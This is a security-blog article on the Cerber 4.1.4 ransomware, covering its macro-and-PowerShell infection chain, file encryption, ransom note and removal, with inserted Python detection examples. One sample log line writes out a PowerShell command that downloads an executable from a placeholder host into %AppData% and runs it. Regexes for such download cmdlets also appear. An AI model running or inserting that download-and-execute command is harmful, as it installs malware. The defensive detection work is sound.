Cerber 4.1.4 Virus Remove It and Try Decrypting Encrypted Files

One of the most impactful ransomware viruses, Cerber, has released yet another iteration of its fourth variant. The virus has changed how it communicates with its C&C servers and made slight changes to its infection methods, switching to malicious macros to conduct the infection. Regarding encryption, not much has changed: Cerber still alters the names of the encrypted files and adds a random 4-character A-Z, 0-9 file extension. Anyone infected by this iteration of Cerber ransomware should immediately focus on removing it from their computer instead of paying the ransom. If you are looking for alternative methods to remove Cerber yourself and try to restore the encrypted files, we suggest you read the following article thoroughly.

Threat Summary

Name: Cerber 4.1.4
Type: Ransomware Virus
Short Description: This Cerber ransomware variant 4.1.4 encrypts files with the RSA or AES ciphers, adding four randomly generated A-Z, 0-9 characters (e.g. .z33f) as a file extension to the encrypted files, and asks a ransom payoff for decryption.
Symptoms: Files are enciphered and become inaccessible to any type of software. Several ransom notes with instructions for paying the ransom appear as “Readme.hta” files.
Distribution Method: Via malicious macros in Microsoft Office or Adobe Reader.
Detection Tool: See If Your System Has Been Affected by Cerber 4.1.4 (Download Malware Removal Tool)
Data Recovery Tool: Data Recovery Pro by ParetoLogic. Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only a few of them, depending on the situation and whether or not you have reformatted your drive.
User Experience: Join our forum to Discuss Cerber Ransomware.

Cerber 4.1.4 – In-Depth Information

To help you better understand how Cerber ransomware version 4.1.4 operates, we will take you through the threat methodically, from distribution to the final ransom payment URL.

Cerber 4.1.4’s Distribution and Infection

To cause a successful infection, the creators of Cerber 4.1.4 ransomware have most likely used a tool known in the research field as a file joiner, which combines malicious files with legitimate documents. This tool may have allowed the coders to create an obfuscated macro infection that is activated only when you enable macros on a Microsoft Office document to edit it shortly after opening it:

[Image: Microsoft Office “Enable Macros” prompt]

The distribution procedure is much the same as for most malware. Phishing e-mails may be used to spam the user, tricking them into opening malicious documents. The documents distributing Cerber 4.1.4 are primarily in .doc file format and have random-digit names, like the following:

[Image: malicious macro document with a random-digit name]

Such a document is attached to a fraudulent spam message that aims to convince the user, with false claims, that the document is important, for example:

[Image: spam e-mail delivering Cerber 4.1.4]

After the malicious macro is opened, the infection may execute in an obfuscated manner, which brings us to another tool used by the coders of Cerber 4.1.4: malware obfuscators, which avoid detection by most conventional and widely used anti-virus programs.

Related Article: Obfuscation in Malware – The Key to a Successful Infection

The malicious macros open PowerShell as an administrator in Windows and quietly execute a command similar to the following:

[Image: PowerShell command launched by the malicious macro]

Then the malware downloads the real payload of Cerber 4.1.4 ransomware by connecting to a remote server via another PowerShell command, similar to the following one reported by Bleeping Computer researchers:

[Image: second PowerShell command downloading the payload]

As can be seen, Cerber ransomware’s payload is downloaded as a file named winx64.exe, located in the %AppData% folder.

As soon as the malicious file is downloaded, the malware automatically runs it, and it begins encrypting the victim’s files.
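As an added detection example (not code from the original article or from Bleeping Computer), the Python below flags the chain described above, a document reader spawning a script host that downloads and runs an .exe under %AppData%, in constructed process-creation telemetry; the ProcEvent fields, the cmdlet list and the sample command line with its example.invalid URL are assumptions for illustration.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style fields); field names are assumed."""
    pid: int
    ppid: int
    image: str
    cmdline: str

# Document readers from which the macro-driven infection is launched.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Download-then-run idioms of the kind used by the two PowerShell commands described above.
DOWNLOAD_OR_RUN = re.compile(r"downloadfile|downloadstring|invoke-webrequest|start-process", re.I)
# An .exe under %AppData%, where the article reports winx64.exe being dropped.
APPDATA_EXE = re.compile(r"(?:%appdata%|\$env:appdata)[^\s\"']*\.exe", re.I)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_macro_chains(events):
    """Return [(pid, reasons)] for every script host spawned by a document reader."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) not in OFFICE_PARENTS:
            continue
        if basename(e.image) not in SCRIPT_HOSTS:
            continue
        reasons = ["office-spawned-script-host"]
        if DOWNLOAD_OR_RUN.search(e.cmdline):
            reasons.append("download-or-run-cmdlet")
        if APPDATA_EXE.search(e.cmdline):
            reasons.append("exe-under-appdata")
        hits.append((e.pid, reasons))
    return hits

# Constructed sample telemetry; example.invalid is a placeholder, not a real C&C address.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(101, 100, r"C:\Program Files\Microsoft Office\WINWORD.EXE", '"WINWORD.EXE" 9273645.doc'),
    ProcEvent(102, 101, r"C:\Windows\System32\powershell.exe",
              r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/p',"
              r"'$env:APPDATA\winx64.exe'); Start-Process '$env:APPDATA\winx64.exe'"),
    ProcEvent(103, 101, r"C:\Windows\splwow64.exe", "splwow64.exe"),  # benign print helper
    ProcEvent(104, 100, r"C:\Windows\System32\powershell.exe", "powershell Get-ChildItem"),  # user-launched
]
```

Calling `find_macro_chains(SAMPLE_EVENTS)` flags only PID 102 with all three reasons; the print helper and the user-launched PowerShell stay silent.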

Cerber 4.1.4 – Post-Infection Analysis

By default, Cerber ransomware has not changed its already strong and so far unbroken encryption. It still uses an immensely strong combination of the RSA and AES encryption algorithms to scramble files of the following types:

  • Microsoft Office documents.
  • Adobe Reader files.
  • Adobe Photoshop and other Adobe software files.
  • Pictures.
  • Videos.
  • Audio files.
  • Databases.
  • Virtual machines.

After encryption, the enciphered files take the same form as in previous versions:

[Image: files encrypted by Cerber]

  • No longer openable.
  • Changed names.
  • Changed file extension.

Cerber also drops its distinctive “Readme.hta” ransom note file, which once more leads to the standard Cerber payment web page:

[Image: Cerber payment page]

After this has been completed, the ransomware may also heavily modify registry entries so that the malicious executable located in the %AppData% folder runs every time Windows starts, encrypting newly added files or files on remote drives such as USB sticks and others.
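The renamed files, the “Readme.hta” note and the %AppData% Run-key persistence described in this section can be triaged together. The Python below is an added example, not part of the original article; its sample folder listings, Run-key values and allowlist of legitimate four-character extensions are constructed for illustration.

```python
import re

RANSOM_NOTE = "readme.hta"
# Cerber 4.1.4 renames each file and appends a random 4-character [a-z0-9] extension (e.g. .z33f).
RANDOM_EXT = re.compile(r"^[a-z0-9]{4}$")
# Legitimate 4-character extensions the pattern would otherwise count (constructed allowlist).
KNOWN_EXT = {"docx", "xlsx", "pptx", "html", "json", "jpeg", "webm", "flac", "mpeg", "heic", "yaml"}
# A Run-key command pointing at an .exe under %AppData%, the persistence the article describes.
APPDATA_RUN = re.compile(r"(?:%appdata%|\\appdata\\roaming\\)[^\s\"]*\.exe", re.I)

def encrypted_file_ratio(names):
    """Share of files (ransom note excluded) whose names fit Cerber's renamed-file pattern."""
    files = [n.lower() for n in names if n.lower() != RANSOM_NOTE]
    if not files:
        return 0.0
    hits = 0
    for n in files:
        stem, _, ext = n.rpartition(".")
        if stem and RANDOM_EXT.match(ext) and ext not in KNOWN_EXT:
            hits += 1
    return hits / len(files)

def triage_folder(names, threshold=0.5):
    """Flag a folder only when most files look renamed AND the ransom note sits beside them."""
    note = any(n.lower() == RANSOM_NOTE for n in names)
    ratio = encrypted_file_ratio(names)
    return {"ratio": round(ratio, 2), "note": note, "flag": note and ratio >= threshold}

def suspicious_run_values(entries):
    """entries are (value name, command) pairs read from a Run key; return the suspicious names."""
    return [name for name, cmd in entries if APPDATA_RUN.search(cmd)]

# Constructed examples, not taken from a real infected machine.
HIT_FOLDER = ["Readme.hta", "k3jd8s7fa1.z33f", "0x9a8b7c6d.7h2q", "budget.docx", "pm29dks0ld.a1b2"]
CLEAN_FOLDER = ["report.docx", "notes.json", "photo.jpeg", "index.html"]
RUN_KEY = [
    ("OneDrive", r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("winx64", r'"C:\Users\u\AppData\Roaming\winx64.exe"'),
    ("updater", r"%AppData%\svc\upd.exe"),
]
```

Requiring both the renamed-file ratio and the note keeps a folder of unusual but legitimate four-character extensions from being flagged on its own.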

How to Remove Cerber 4.1.4 Virus and Try To Get Back Encrypted Files

Basically, Cerber 4.1.4 is yet another of the many Cerber variants we have so far detected in the wild. The malware is very sophisticated in what it does, and researchers are yet to discover any bugs in its code that would allow them to crack the virus, as they did with the first variant of Cerber.

If you are looking for methods to restore your files after they have been encoded by this nasty threat, our advice is to act immediately and remove it safely using the instructions below. You can try to remove it manually, but we strongly recommend using a professional malware removal tool to do the job for you swiftly and safely.

After removing Cerber, try the alternative suggestions we have offered that may help you recover your non-openable files. We are constantly researching new data recovery methods that will help you recover your files. Since sophisticated malware like Cerber deletes the files with several passes, it is very difficult to come up with a solution that is 100% effective. Still, we will keep researching and fighting this nasty threat, and will update this article with more information if a decryptor is released, so we advise following our blog regularly.

Manually delete Cerber 4.1.4 from your computer

Note! Important notice about the Cerber 4.1.4 threat: manual removal of Cerber 4.1.4 requires interference with system files and registries, so it can cause damage to your PC. Even if your computer skills are not at a professional level, don’t worry: you can do the removal yourself in just 5 minutes using a malware removal tool.

1. Boot Your PC In Safe Mode to isolate and remove Cerber 4.1.4 files and objects
2. Find malicious files created by Cerber 4.1.4 on your PC

Automatically remove Cerber 4.1.4 by downloading an advanced anti-malware program

1. Remove Cerber 4.1.4 with SpyHunter Anti-Malware Tool and back up your data

Try to Recover Files Encrypted by Cerber 4.1.4 on your computer

Restore files encrypted by Cerber 4.1.4

Vencislav Krustev

A network administrator and malware researcher at SensorsTechForum with a passion for discovering new shifts and innovations in cyber security. A strong believer in basic online-safety education for every user.

